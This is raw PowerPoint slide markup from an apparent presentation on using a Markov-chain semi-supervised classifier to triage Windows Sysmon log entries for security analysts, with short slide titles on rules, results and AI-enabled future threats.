              </a:rPr>
              <a:t>Windows Sysmon log entries via Windows Event Forwarder Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="TextBox 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5563E1E6-E452-4AFF-829E-C904EE29081A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10209058" y="3003117"/>
            <a:ext cx="705409" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analyst</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Picture 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{345E6F5B-1DC3-4AC1-8121-D2FC7BA3218B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect l="6446" t="6874" r="6589" b="12650"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10221746" y="2361075"/>
            <a:ext cx="691421" cy="690175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2868611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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1498488"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C890A7-3D36-40F6-8217-F60650A82FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622168" y="1902872"/>
            <a:ext cx="6864481" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THE RULES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA2E6A1D-414E-48C2-9D4D-4768E265DE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="230" t="1254" r="63044" b="1143"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1422995" y="2477805"/>
            <a:ext cx="8605588" cy="397418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720597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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A025B4-8D50-4991-B746-55F7E113B519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect b="5639"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818883" y="1486183"/>
            <a:ext cx="4385271" cy="5351517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26FB343-CEDA-4204-9AC9-9B2BB1EDCDD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7818883" y="1486181"/>
            <a:ext cx="4385271" cy="5371819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9B584C-4F1C-4102-AC9D-22390548B9C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079981" y="2428342"/>
            <a:ext cx="1417222" cy="341483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F61C91C5-6707-4859-904B-D1205AE1D571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25518" y="1932269"/>
            <a:ext cx="1932917" cy="445934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4" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AE72B5A-0C75-4591-BC1D-6D0D5A82F2D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885966" y="1858500"/>
            <a:ext cx="1932917" cy="453311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id="{F17198CC-B94E-4201-8102-89FEA047D68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137187" y="1840945"/>
            <a:ext cx="4761362" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MARKOV CHAIN BASED RANDOM WALK SEMI-SUPERVISED CLASSIFIER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Markov Chain">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D708BD3D-9BEC-491D-838C-FDA75118DCB5}"/>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1178451" y="2511522"/>
            <a:ext cx="4236979" cy="4326178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3034955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60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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1498488"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C890A7-3D36-40F6-8217-F60650A82FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799721" y="1902872"/>
            <a:ext cx="6864481" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>THE RESULTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B93D6D-BE8A-46E0-8622-4FF98815BD46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="1464" r="695" b="51681"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="967543" y="2574523"/>
            <a:ext cx="10600062" cy="2011273"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3946D075-2831-491B-BEF0-21CFA465F9AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2309190" y="5067808"/>
            <a:ext cx="7916767" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Identifies log entries that are similar to other rules but without explicit rules i.e. identifies behaviour of Microsoft Edge launch by Lync as same as Chrome launched by Lync although no explicit rule!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Having to analyse 100 entries manually now rather than 25,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD7D607-AB35-4BBF-A29D-15F7336B0FF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="897525" y="2667774"/>
            <a:ext cx="10530044" cy="17288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699413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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18692E09-154C-4B97-9EAF-B59B5963CE37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1216"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2324" y="1486184"/>
            <a:ext cx="12194324" cy="6189345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B222920F-988C-4893-A460-5E64EA5A726A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835232" y="4319246"/>
            <a:ext cx="6083432" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PEERING INTO THE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FUTURE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2720863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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1498488"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48C890A7-3D36-40F6-8217-F60650A82FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799721" y="1902872"/>
            <a:ext cx="9515854" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CYBER SECURITY TODAY Vs AI ENABLED THREAT OF TOMORROW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Table 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC66CFE5-85A5-4387-8C5F-2F581F61407D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192935459"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1828404" y="3114151"/>
          <a:ext cx="8532866" cy="2264411"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{21E4AEA4-8DFA-4A89-87EB-49C32662AFE0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4189196">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1501683408"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4343670">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="232840787"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="464742">
